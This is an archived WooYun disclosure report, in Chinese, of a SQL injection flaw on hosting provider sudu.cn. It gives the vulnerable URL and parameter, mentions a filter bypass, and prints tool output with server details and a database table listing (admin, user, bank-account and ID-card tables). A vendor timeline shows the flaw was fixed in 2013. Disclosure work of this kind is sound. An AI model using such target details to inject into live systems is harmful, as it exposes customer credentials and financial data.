乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-01-25: 细节已通知厂商并且等待厂商处理中 2013-01-28: 厂商已经确认,细节仅向厂商公开 2013-02-07: 细节向核心白帽子及相关领域专家公开 2013-02-17: 细节向普通白帽子公开 2013-02-27: 细节向实习白帽子公开 2013-03-11: 细节向公众公开
华夏名网主站注入
http://www.sudu.cn/webhosting/cp/f10_sqltools_done.phpaction=getsqlused&did=483710主站所有的信息都在里面了,包括会员账号、密码、代理商账号密码、虚拟主机、VPS、域名……等信息中间有点小插曲,网站有过滤,不过可以绕过继续注入
Target: http://www.sudu.cn/webhosting/cp/f10_sqltools_done.phpHost IP: 125.64.24.31Web Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e DAV/2 PHP/5.3.17Powered-by: PHP/5.3.17DB Server: MySQL >=5Current DB: bigwwwcom
vserver vhosttransferQueue vhost userinfo user......... domain2_deleted_bak domain2_deleted domain2 dnslist dnshost datauser config cdnset cdnlistView cdnlist cdn2domain cdn2 alipay_dut_log adminPrivilege admin WebossUsage WebossTry WebSubsites WebSiteUnusualLog WebHostingEvent WebHostingCustom WebHostingAlterTrace WebHostingAlter VpsHostInfo VhostAppList VhostAppInstallInfo VServerIP VServerBinding UserTrack UserProductsGroup UserOperateLog UserDigVhost UserDigKeyword UserDigHistory UserDigEmuser UserDig UrlBlackList ......... Server SeoHistory SendMailPlan SDKValidate SDKUser SDKTemplate SDKIpayTotal RewriteRule PushTracking ProductTryTrace ProductGroup Points PackageSetting Package PServerInfo OldUserPlan OldUserList NotifyRead Notify MoveVhostTrack MoveIpTrack MoveCdnTrack MigrateHost MailTemplate MachineRoom KeywordsBlack IpUseData IDcard ICPinfo HypervVpsData HypervHostList HostResourcesUsedData HostInfo .......DomainPrice DomainBeianNew DomainBeianCheck DomainBeianCancel DnsOurs CouponPresentsGroup CouponPresentsClass CouponPresentsBrand CouponPresents CouponCaipiao Coupon ContactInfo CheckURL CashVoucherUsed CashVoucher BankAccounts BackupTablesConf AppInstallInfo AppInfo AliasType AliasMap AgentInfo AdminServiceApply AccessTracking
用户比较多。这个自评20rank不为过吧?
你们有专业人员
危害等级:高
漏洞Rank:20
确认时间:2013-01-28 15:01
已经通知技术修补,该漏洞为较大漏洞
2013-12-26:已修复